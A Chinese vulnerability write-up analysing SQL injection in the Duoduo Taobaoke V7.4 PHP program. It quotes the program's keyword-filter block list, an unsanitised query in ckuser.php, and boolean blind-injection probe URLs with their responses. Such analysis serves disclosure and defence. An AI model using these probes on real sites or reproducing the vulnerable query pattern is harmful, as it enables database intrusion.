手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >多多淘宝客V7.4绕过防注入及一个注入漏洞的分析
多多淘宝客V7.4绕过防注入及一个注入漏洞的分析
摘要:由于程序是开源程序并下载其程序看了一番。其实程序员还是有一点安全意识的:防注入代码:复制代码代码如下://要过滤的非法字符$ArrFiltr...

由于程序是开源程序

并下载其程序看了一番。其实程序员还是有一点安全意识的:

防注入代码:

复制代码代码如下:

//要过滤的非法字符

$ArrFiltrate = array (

"#union#i",

"#<script#i",

"#/script>#i",

"#select#i",

"#alert#i",

"#javascript#i",

"#<table#i",

"#<td#i",

"#"#i",

"#'#i",

"#delete#i",

"#vbscript#i",

"#applet#i",

"#frame#i",

"#<div#i",

"#update#i",

"#'#i",

"#union #i",

"#select #i",

"#delete #i",

"#update #i",

"#and #i",

"#;#i",

"#update#i"

);

$replacements='';

function FunStringExist(&$array,$ArrFiltrate,$replacements)

{

if (is_array($array))

{

foreach ($array as $key => $value)

{

if (is_array($value))

FunStringExist($array[$key],$ArrFiltrate,$replacements);

else

$array[$key] = preg_replace($ArrFiltrate, $replacements, $value);

}

}

}

FunStringExist($_GET,$ArrFiltrate,$replacements);

FunStringExist($_POST,$ArrFiltrate,$replacements);

这段代码多少还是有瑕疵的、只过滤 get post 我们只要找调用request的地方

别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响

复制代码代码如下:

header("Content-Type:text/html;charset=utf-8");

include "../comm/config.php";

$uname = trim($_GET["name"]);

if($uname==''){

echo "true";

}else{

$con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB);

mysql_select_db("$dbname",$con)or die("can not choose the dbname!");

$query="select * from ".$BIAOTOU."user where ddusername='".$uname."'";

mysql_query("set names utf8");

$res=mysql_query($query);

if(mysql_num_rows($res)!=0)

{echo "true";}

else

{echo "false";}

}

首先注册一个用户.让程序能过判断

ckuser.php?name=maxadd' and 1=1 and ''='

返回true

ckuser.php?name=maxadd' and 1=2 and ''='

返回false

【多多淘宝客V7.4绕过防注入及一个注入漏洞的分析】相关文章:

金山毒霸多个sql注入及XSS漏洞和修复

IPB2注入漏洞的深入利用

Discuz!NT 2.5最新注入漏洞测试分析(图)

中关村在线博客子站SQL注入及修复方案

对Extmail安全漏洞的分析

微软IE5与IE6存在 FTP跨站命令注入漏洞

入侵检测系统漏洞的分析

BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞

暴风影音视频加速程序模块缓冲区溢出漏洞的分析

Mozilla邮件客户端MIME外部主体堆溢出漏洞

精品推荐
分类导航